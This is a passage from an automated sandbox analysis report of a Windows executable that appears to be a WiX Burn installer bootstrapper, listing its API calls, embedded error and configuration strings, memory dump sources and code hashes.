                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                              • Instruction ID: 561d15c22e695a4acdfc1760f0c414e66d979e97938a65c56d5c9644b05df421
                                                                                                                                                              • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                              • Instruction Fuzzy Hash: 6D023CB1E00219AFDF14CFA9C8806ADB7F1FF48324F258169D919E7381E774A941CB91
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00803BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00803A8E,?), ref: 00803C62
                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00803AB2
                                                                                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00803AC3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2114926846-0
                                                                                                                                                              • Opcode ID: 6e6128de436ade2e4b4744ffd855c3cabd89891d6475973eeaefd52fd6a4d716
                                                                                                                                                              • Instruction ID: b896bd6ae89d94da0e78b8da806fefe03833f58ef56e4834aac691a8b1b3e178
                                                                                                                                                              • Opcode Fuzzy Hash: 6e6128de436ade2e4b4744ffd855c3cabd89891d6475973eeaefd52fd6a4d716
                                                                                                                                                              • Instruction Fuzzy Hash: 2E11F371A0061AAFDB50DFA9DC85AAFBBBCFF08304F50482AA551E6191E7709A448B61
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00804487
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0$comres.dll
                                                                                                                                                              • API String ID: 0-3030269839
                                                                                                                                                              APIs
                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007FEE77,?,?,00000008,?,?,007FEB17,00000000), ref: 007FF0A9
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                              APIs
                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007EEC20
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,007EE131), ref: 007EE9E1
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                              • Instruction ID: 1e16f1a6a797550077f7558a0469686e9fb0162fad0670a76303c5270e2887c1
                                                                                                                                                              • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                              • Instruction Fuzzy Hash: 02B1A6332051A64BEF2D4339843447EFBE16E923B131A179DD5B2CB3C6EE289535D6A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3a540c1a3de8ee6690d91daa133e103aa820faafca9d52b8037db3454c19a1de
                                                                                                                                                              • Instruction ID: 6e88f7361004678e97048db4e69d73db0f2a164c1370488d022aad4f82198866
                                                                                                                                                              • Opcode Fuzzy Hash: 3a540c1a3de8ee6690d91daa133e103aa820faafca9d52b8037db3454c19a1de
                                                                                                                                                              • Instruction Fuzzy Hash: 6A615B7172070D96DB3899288899BBE63E5AF41710F64091AFB42DF383D61DDE83C615
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,comres.dll,00000000,0080CA9C,?,00000000), ref: 007CCEF3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCompareProcessString
                                                                                                                                                              • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$cabinet.dll$comres.dll$download$embedded$external$feclient.dll$msasn1.dll$msi.dll$payload.cpp$version.dll$wininet.dll
                                                                                                                                                              • API String ID: 1171520630-1949177747
                                                                                                                                                              • Opcode ID: 799bb626a704e824f0488de0cbba415f0f4fa41f387d31a82cb672fc41feac23
                                                                                                                                                              • Instruction ID: 0c73031c1818be76eaeefdb30313e90d054cb7b6791cc82f1bbf3115f854b2ad
                                                                                                                                                              • Opcode Fuzzy Hash: 799bb626a704e824f0488de0cbba415f0f4fa41f387d31a82cb672fc41feac23
                                                                                                                                                              • Instruction Fuzzy Hash: ACC1D072904629FBCB719A94CC02FADB764FB04B20F25427DFA11F66D1D778EE009A90
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 007D0592
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                                                                                                                              • API String ID: 3535843008-2755343042
                                                                                                                                                              • Opcode ID: 93dad02a8615c30061fa5b3fbcd0f8759ff4890839bc386bf26da5dba971ff44
                                                                                                                                                              • Instruction ID: 4a8ce0c8a92bc82b0a85ab9224ca99be385cc61072b790bc898a42a02a741b01
                                                                                                                                                              • Opcode Fuzzy Hash: 93dad02a8615c30061fa5b3fbcd0f8759ff4890839bc386bf26da5dba971ff44
                                                                                                                                                              • Instruction Fuzzy Hash: 23F1C031A41A25BBCF2256649D06FAE7679FF00720F041112FD11F63A1CBB9EDA0EAC1
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,80070490,?,?,?,?,?,?,?,ET|,007EC1BF,?,?,?), ref: 007C84A7
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,ET|,007EC1BF,?,?,?,?,ET|,Chain), ref: 007C8804
                                                                                                                                                              Strings
                                                                                                                                                              • Initializing version variable '%ls' to value '%ls', xrefs: 007C8653
                                                                                                                                                              • Invalid value for @Type: %ls, xrefs: 007C8778
                                                                                                                                                              • Initializing numeric variable '%ls' to value '%ls', xrefs: 007C85E2
                                                                                                                                                              • Failed to get @Hidden., xrefs: 007C87E8
                                                                                                                                                              • version, xrefs: 007C862C
                                                                                                                                                              • Failed to get variable node count., xrefs: 007C84E1
                                                                                                                                                              • variable.cpp, xrefs: 007C87B9
                                                                                                                                                              • Failed to set variant value., xrefs: 007C878F
                                                                                                                                                              • Failed to set value of variable: %ls, xrefs: 007C87A7
                                                                                                                                                              • Variable, xrefs: 007C84B1
                                                                                                                                                              • Failed to select variable nodes., xrefs: 007C84C4
                                                                                                                                                              • numeric, xrefs: 007C85BC
                                                                                                                                                              • ET|, xrefs: 007C8476
                                                                                                                                                              • Value, xrefs: 007C8565
                                                                                                                                                              • string, xrefs: 007C85F7
                                                                                                                                                              • Failed to insert variable '%ls'., xrefs: 007C86C6
                                                                                                                                                              • Failed to set variant encryption, xrefs: 007C879D
                                                                                                                                                              • Failed to get @Id., xrefs: 007C87EF
                                                                                                                                                              • Failed to get @Persisted., xrefs: 007C87E1
                                                                                                                                                              • Failed to find variable value '%ls'., xrefs: 007C87D2
                                                                                                                                                              • Failed to get @Type., xrefs: 007C8788
                                                                                                                                                              • Failed to get @Value., xrefs: 007C8796
                                                                                                                                                              • Initializing string variable '%ls' to value '%ls', xrefs: 007C861A
                                                                                                                                                              • Initializing hidden variable '%ls', xrefs: 007C8671
                                                                                                                                                              • Failed to change variant type., xrefs: 007C87DA
                                                                                                                                                              • Failed to get next node., xrefs: 007C87F6
                                                                                                                                                              • Attempt to set built-in variable value: %ls, xrefs: 007C87C8
                                                                                                                                                              • Persisted, xrefs: 007C854A
                                                                                                                                                              • Hidden, xrefs: 007C852F
                                                                                                                                                              • Type, xrefs: 007C85A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Attempt to set built-in variable value: %ls$ET|$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                                                              • API String ID: 3168844106-1246278463
                                                                                                                                                              • Opcode ID: 3761819c129e8a05afada8616cdeed6667147d8853634ddc808f0a719c2e2d09
                                                                                                                                                              • Instruction ID: ea5035fc4ee1c234144720b2ae9377c73e7f1230616ef81aacd5722247fc8972
                                                                                                                                                              • Opcode Fuzzy Hash: 3761819c129e8a05afada8616cdeed6667147d8853634ddc808f0a719c2e2d09
                                                                                                                                                              • Instruction Fuzzy Hash: 8FB19372D40229FBCB919B94CC45FAEBBB5FF44720F20025DF910B62D1DB799A409B92
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,007DBDDC,00000007,?,?,?), ref: 007E6D20
                                                                                                                                                                • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
                                                                                                                                                                • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
                                                                                                                                                                • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 007E710F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 007E7123
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to determine WOW64 status., xrefs: 007E6D32
                                                                                                                                                              • wusa.exe, xrefs: 007E6DA0
                                                                                                                                                              • /log:, xrefs: 007E6EA2
                                                                                                                                                              • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 007E6E75
                                                                                                                                                              • Failed to allocate WUSA.exe path., xrefs: 007E6DB3
                                                                                                                                                              • Failed to CreateProcess on path: %ls, xrefs: 007E6F9A
                                                                                                                                                              • Failed to ensure WU service was enabled to install MSU package., xrefs: 007E6F2E
                                                                                                                                                              • Failed to find System32 directory., xrefs: 007E6D95
                                                                                                                                                              • Failed to format MSU uninstall command., xrefs: 007E6E89
                                                                                                                                                              • Failed to find Windows directory., xrefs: 007E6D5F
                                                                                                                                                              • msuengine.cpp, xrefs: 007E6F8D, 007E7022, 007E704A
                                                                                                                                                              • Failed to build MSU path., xrefs: 007E6E35
                                                                                                                                                              • Failed to get action arguments for MSU package., xrefs: 007E6DD6
                                                                                                                                                              • Failed to append log switch to MSU command-line., xrefs: 007E6EB6
                                                                                                                                                              • Failed to append log path to MSU command-line., xrefs: 007E6ED4
                                                                                                                                                              • Bootstrapper application aborted during MSU progress., xrefs: 007E7054
                                                                                                                                                              • Failed to wait for executable to complete: %ls, xrefs: 007E709E
                                                                                                                                                              • Failed to format MSU install command., xrefs: 007E6E5C
                                                                                                                                                              • Failed to get process exit code., xrefs: 007E702C
                                                                                                                                                              • D, xrefs: 007E6F3B
                                                                                                                                                              • 2, xrefs: 007E6FB3
                                                                                                                                                              • Failed to get cached path for package: %ls, xrefs: 007E6DFC
                                                                                                                                                              • WixBundleExecutePackageCacheFolder, xrefs: 007E6E0B, 007E713B
                                                                                                                                                              • Failed to append SysNative directory., xrefs: 007E6D7D
                                                                                                                                                              • "%ls" "%ls" /quiet /norestart, xrefs: 007E6E48
                                                                                                                                                              • SysNative\, xrefs: 007E6D6A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                              • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                                                                                                                              • API String ID: 1400713077-4261965642
                                                                                                                                                              • Opcode ID: 354bef62e21e5b49cd283d1c810f5fe676eee5d4b6e796763c9a8a870e5fc451
                                                                                                                                                              • Instruction ID: 745f249d7bd5a48e880ef1cc1620498404493d802a7e8a512d8f77c21aee7b08
                                                                                                                                                              • Opcode Fuzzy Hash: 354bef62e21e5b49cd283d1c810f5fe676eee5d4b6e796763c9a8a870e5fc451
                                                                                                                                                              • Instruction Fuzzy Hash: 19D18C70B4135AEADF119FA6CC86FAE7BB8FF28710F500029B610E6191D7B99940DB51
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,?,0080B500,?,00000000,?,007C452F,?,0080B500), ref: 007D54FD
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,007C452F,?,0080B500), ref: 007D5508
                                                                                                                                                              • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,007C452F,?,0080B500), ref: 007D553F
                                                                                                                                                              • ConnectNamedPipe.KERNEL32(?,00000000,?,007C452F,?,0080B500), ref: 007D5554
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D555E
                                                                                                                                                              • Sleep.KERNEL32(00000064,?,007C452F,?,0080B500), ref: 007D5593
                                                                                                                                                              • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55B6
                                                                                                                                                              • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55D1
                                                                                                                                                              • WriteFile.KERNEL32(?,/E|,0080B500,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55EC
                                                                                                                                                              • WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,007C452F,?,0080B500), ref: 007D5607
                                                                                                                                                              • ReadFile.KERNEL32(?,wininet.dll,00000004,feclient.dll,00000000,?,007C452F,?,0080B500), ref: 007D5622
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D567D
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D56B1
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D56E5
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D5719
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D574A
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D577B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                              • String ID: /E|$Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$comres.dll$crypt32.dll$feclient.dll$pipe.cpp$wininet.dll
                                                                                                                                                              • API String ID: 2944378912-3629184392
                                                                                                                                                              • Opcode ID: 82ec010c969cd87fc280c6e7f965419d9236485208af037a075e2710ff076b7f
                                                                                                                                                              • Instruction ID: f222642b49e946f150b78fe61e2076150fd6b0e68284c5c9659d9d7cc117dab0
                                                                                                                                                              • Opcode Fuzzy Hash: 82ec010c969cd87fc280c6e7f965419d9236485208af037a075e2710ff076b7f
                                                                                                                                                              • Instruction Fuzzy Hash: EB71A676D81635BBD7209AA58C49FAE76B8BF04F20F214126BD15FB380E66CDD4086E0
                                                                                                                                                              APIs
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007ED4B3
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 007ED4DC
                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 007ED5C5
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 007ED5CF
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 007ED668
                                                                                                                                                              • WaitForSingleObject.KERNEL32(0080B500,000000FF,?,?,?,?), ref: 007ED673
                                                                                                                                                              • ReleaseMutex.KERNEL32(0080B500,?,?,?,?), ref: 007ED69D
                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 007ED6BE
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 007ED6CC
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 007ED704
                                                                                                                                                                • Part of subcall function 007ED33E: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,007ED642,?), ref: 007ED357
                                                                                                                                                                • Part of subcall function 007ED33E: ReleaseMutex.KERNEL32(?,?,?,?,007ED642,?), ref: 007ED375
                                                                                                                                                                • Part of subcall function 007ED33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED3B6
                                                                                                                                                                • Part of subcall function 007ED33E: ReleaseMutex.KERNEL32(?), ref: 007ED3CD
                                                                                                                                                                • Part of subcall function 007ED33E: SetEvent.KERNEL32(?), ref: 007ED3D6
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 007ED7B9
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 007ED7D1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
